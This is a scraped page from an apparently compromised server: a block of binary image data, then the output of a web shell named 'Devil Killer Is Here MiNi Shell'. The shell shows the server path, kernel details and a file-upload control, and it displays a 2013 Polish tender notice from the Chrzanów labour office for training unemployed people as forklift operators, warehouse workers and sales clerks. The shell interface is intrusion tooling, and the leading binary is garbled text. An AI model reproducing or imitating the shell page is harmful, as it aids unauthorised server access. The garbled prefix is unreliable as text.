JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130417/151114-N-2013.html

<p class="kh_header"><b>Chrzanów: Przeprowadzenie szkoleń grupowych dla:osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie, w ramach: środków finansowych z  Funduszu Pracy.</b><br>
<b>Numer ogłoszenia: 151114 - 2013; data zamieszczenia: 17.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chrzanowie , ul. Słowackiego 8, 32-500 Chrzanów, woj. małopolskie, tel. 032 7533800, faks 032 7533899.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń grupowych dla:osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie, w ramach: środków finansowych z  Funduszu Pracy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  przeprowadzenie szkoleń zawodowych dla:
osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie  w ramach  środków finansowych z Funduszu Pracy. 

Zamówienie składa się z  3  części: 

Część  1.  Operator  wózka widłowego :    - dla   10  osób,  planowany termin realizacji:  II-III kwartał 2013r.                                

Część  2. Magazynier  - dla 10 osób, planowany termin realizacji: II kwartał  2013.

Część  3.  Sprzedawca - Fakturzysta  :- dla  10  osób  - planowany termin realizacji: III kwartał 2013r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Aktualny wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365) - dotyczy wszystkich części zamówienia. 
b)Dokument potwierdzający zatwierdzenie programu do prowadzenia szkoleń w zakresie kierowców wózków jezdniowych przez jednostkę organizacyjną wyznaczoną przez ministra właściwego ds. gospodarki zgodnie  z  Rozporządzeniem  Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym ( Dz. U nr 70, poz. 650 z późn. zm.)  - dotyczy części  1 i 2 zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się przeprowadzeniem z należytą starannością, co najmniej jednego szkolenia grupowego w  okresie ostatnich trzech lat ( dla min. 10 osób )  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia  dla poszczególnych części zamówienia
( załącznik nr 5 do SIWZ).  
2.W przypadku rozbieżności pomiędzy nazwą szkolenia wskazaną w SIWZ a nazwą wykazaną w załączniku nr 5 w ocenie doświadczenia będą uwzględnione te szkolenia, w których Wykonawca wykaże, 
 że program tematyczny zrealizowanych przez niego  zamówień obejmował  co najmniej 70% wymaganego przez Zamawiającego minimum programowego wskazanego w załączniku nr 1 część II do SIWZ  ( stosownie do części zamówienia, której oferta dotyczy ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował  urządzeniami  adekwatnymi do danej  części zamówienia umożliwiającymi realizację szkolenia ( załącznik nr  10 do  SIWZ),

Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe wyposażone w  niezbędne narzędzia  i materiały . Każdy z uczestników szkolenia powinien  mieć indywidualny  dostęp do sprzętu  i materiałów wykorzystywanych przy realizacji szkolenia  ( np.  indywidualny dostęp do kasy fiskalnej, stanowiska komputerowego).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował   osobą lub osobami do każdej z części zamówienia, które posiadają adekwatne do zakresu szkolenia  kwalifikacje, wykształcenie,  doświadczenie zawodowe ( załącznik nr 11 do  SIWZ). 
Przynajmniej jeden z wykładowców musi posiadać wykształcenie wyższe kierunkowe oraz uprawnienia pedagogiczne i co najmniej roczne doświadczenie w prowadzeniu szkoleń o tematyce zgodnej z przedmiotem zamówienia. 
Zamawiający wymaga, aby opiekunowie prowadzący zajęcia praktyczne w placówkach handlowo-magazynowych posiadali co najmniej wykształcenie zasadnicze zawodowe i co najmniej 3 lata doświadczenia zawodowego lub wykształcenie średnie zawodowe i co najmniej 1 rok  doświadczenia zawodowego na stanowisku magazyniera  - dotyczy części 1 zamówienia.  Na jednego opiekuna stanowiskowego nie może przypadać więcej niż 2 uczestników szkolenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga pzredstawienia dokumentów potwierdzających spełnienie ww. warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenie  Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych  w  art. 22 ust. 1 ustawy PZP, według wzoru na Załączniku nr 3 do SIWZ ( oryginał),
2.Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na  ubezpieczenie zdrowotne  i społeczne stanowiące załącznik nr 9 niniejszej specyfikacji, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną    do podpisania oferty. 
3.Pisemne oświadczenie o zagwarantowaniu zorganizowania szkolenia w granicach administracyjnych powiatu chrzanowskiego  stanowiące załącznik nr  12  niniejszej specyfikacji,  przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do  podpisania oferty .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.70</li>
<li>2 - Doświadczenie wykonawcy - 0.20</li>
<li>3 - Posiadne certyfikaty jakości usług - 0.05</li>
<li>4 - Rodzaj dokumentu potiwerdzajcego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza   możliwość  zmiany  postanowień  umowy, której wzór stanowi załącznik nr 8 do niniejszej   SIWZ. Zmiany mogą dotyczyć:
1.zakresu  usług objętych umową,  w przypadku  zmian przepisów prawa w tym zakresie,
2.miejsca realizacji  świadczeń z  zastrzeżeniem lokalizacji na terenie powiatu chrzanowskiego,
3.kadry wykonującej przedmiot zamówienia z przyczyn losowych ( za zgodą Zamawiającego ),
4.terminu przeprowadzenia szkolenia  
5.zmiana  kosztów szkolenia jeżeli te zmiany są korzystne dla  Zamawiającego,
6.zmiana kosztu osobogodziny jeżeli  ta  zmiana jest  korzystna dla  Zamawiającego
7.zmiany w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy określonego  w  § 5 umowy szkoleniowej oraz tego,  że  plan nauczania będzie obejmował przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu. Termin realizacji zamówienia może ulec zmianie tylko w szczególnie uzasadnionych przypadkach.

Warunkiem dokonania zmiany jest  zawiadomienie o zaistnieniu w/w okoliczności w formie pisemnej .

Ewentualne wprowadzenie wskazanych powyżej zmian do umowy nie może skutkować zwiększeniem wynagrodzenia wynikającego  z tytułu realizacji umowy.
Zgodę na  dokonanie zmian musi wyrazić każda ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy, ul. Słowackiego 8, 32-500 Chrzanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2013 godzina 08:30, miejsce: Powiatowy Urząd Pracy, ul. Słowackiego 8, 32-500 Chrzanów, Dziennik Podawczy, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Obsługa wózka widłowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób  w specjalności: Obsługa wózka widłowego
2.  Miejsce organizacji szkolenia:  powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3.Program szkolenia powinien obejmować  187   godzin dydaktycznych z czego:
I moduł -  Szkolenie powinno  być przeprowadzone  w oparciu o program opracowany lub zatwierdzony przez jednostkę organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym ( Dz. U nr 70, poz. 650 z późn. zm.)  - 67 godzin.
II moduł - Zajęcia praktyczne w placówkach handlowo-magazynowych - 120 godzin zegarowych na każdego uczestnika i rozpoczną się bezpośrednio po zakończeniu modułu I.  

4.Sposób organizacji zajęć praktycznych:  
a. zajęcia praktyczne w ramach modułu I mają być przeprowadzone zgodnie z Rozporządzeniem Ministra Gospodarki  z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym ( Dz. U nr 70, poz. 650 z późn. zm.)
b. W  ramach zajęć praktycznych ( moduł I ) uczestnicy nabędą m.in. następujące umiejętności: Praktyczna nuka jazdy; Konserwacja wózka widłowego; Przemieszczanie masy towarowej na paletach; Wymiana butli gazowych.
c. Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 
d. Wykonawca zapewni przeprowadzenie II modułu programu szkolenia  każdemu uczestnikowi  , zapewni taką ilość punktów handlowo-magazynowych, aby efektywnie i bez przeszkód mogli w tym samym czasie odbywać praktykę zawodową wszyscy uczestnicy szkolenia. Na jednego opiekuna stanowiskowego nie może przypadać więcej niż 2 uczestników szkolenia. 
e. zamawiający wymaga, aby opiekunowie prowadzący zajęcia praktyczne w placówkach handlowo-magazynowych posiadali co najmniej wykształcenie zasadnicze zawodowe i co najmniej 3 lata doświadczenia zawodowego lub wykształcenie średnie zawodowe i co najmniej 1 rok  doświadczenia zawodowego na stanowisku magazyniera.   
f. Instytucja szkoleniowa przed podpisaniem umowy dostarczy wykaz instytucji, w których będą realizowane zajęcia praktyczne. 
g. w trakcie zajęć praktycznych w placówkach handlowo-magazynowych opiekunowie stanowiskowi  prowadzą indywidualne karty  praktyki zawodowej. Po zakończeniu moduły II opiekunowie praktyk wystawiają  każdemu uczestnikowi  ocenę i opinię o praktykancie. Kserokopie ww. dokumentów instytucja szkoleniowa przekaże PUP przy rozliczeniu szkolenia. 

5.Czas trwania: 
I moduł:  nie dłużej niż  15  kolejnych dni roboczych. 
II moduł  - 20 kolejnych dni roboczych

6.Termin realizacji szkolenia:  II - III kwartał 2013r. 


7.Inne postanowienia:
a.  Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) Zaświadczenie  musi być wydane zgodnie z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14.  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy  ( Dz. U. nr 177, poz. 1193 ). 
b.Ponadto w ramach szkolenia uczestnicy muszą przystąpić do egzaminu, którego celem jest uzyskanie: Zaświadczenia kwalifikacyjnego do obsługi urządzeń transportu bliskiego wystawionego przez Urząd Dozoru Technicznego. 
c.Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia. 
d.Rozliczenie szkolenie nastąpi po odbyciu przez uczestników szkolenia  praktyk w placówkach handlowo-magazynowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Certyfikaty jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzajęcego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Magzynier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla 10  osób bezrobotnych w specjalności: Magazynier

2.  Miejsce organizacji szkolenia: powiat chrzanowski

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony
 do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 załączniku nr 7 do SIWZ).  
3. Program szkolenia powinien obejmować  120 godzin dydaktycznych i zawierać następujące moduły:

1.Przepisy bezpieczeństwa i higieny pracy w pracy na stanowisku magazyniera
2.Obsługa kas fiskalnych
3.Praktyczna nauka jazy wózkiem jezdniowym z napędem silnikowym
4.Wymiana butli gazowych
5.Zajęcia komputerowe z obsługi programu Subiekt - min. 30 godz. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia.

4.Sposób organizacji zajęć praktycznych: 

W ramach zajęć praktycznych uczestnicy szkolenia mają nabyć umiejętności:
-obsługi kasy fiskalnej
-obsługi wózka widłowego
-obsługi programu SUBIEKT
-wymiany butli gazowej
-Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 70%. 
-Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych a także odzież roboczą. 

5.Czas trwania: nie dłużej niż  20 kolejnych dni roboczych.  

6.Termin realizacji szkolenia:  II kwartał 2013. 

7. Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma:
a.Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) Zaświadczenie  musi być wydane zgodnie z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14.  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy
 ( Dz. U. nr 177, poz. 1193 ). 
b.Ponadto w ramach szkolenia uczestnicy muszą przystąpić do egzaminu, którego celem jest uzyskanie: Zaświadczenia kwalifikacyjnego do obsługi urządzeń transportu bliskiego wystawionego przez Urząd Dozoru Technicznego. 
c.Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
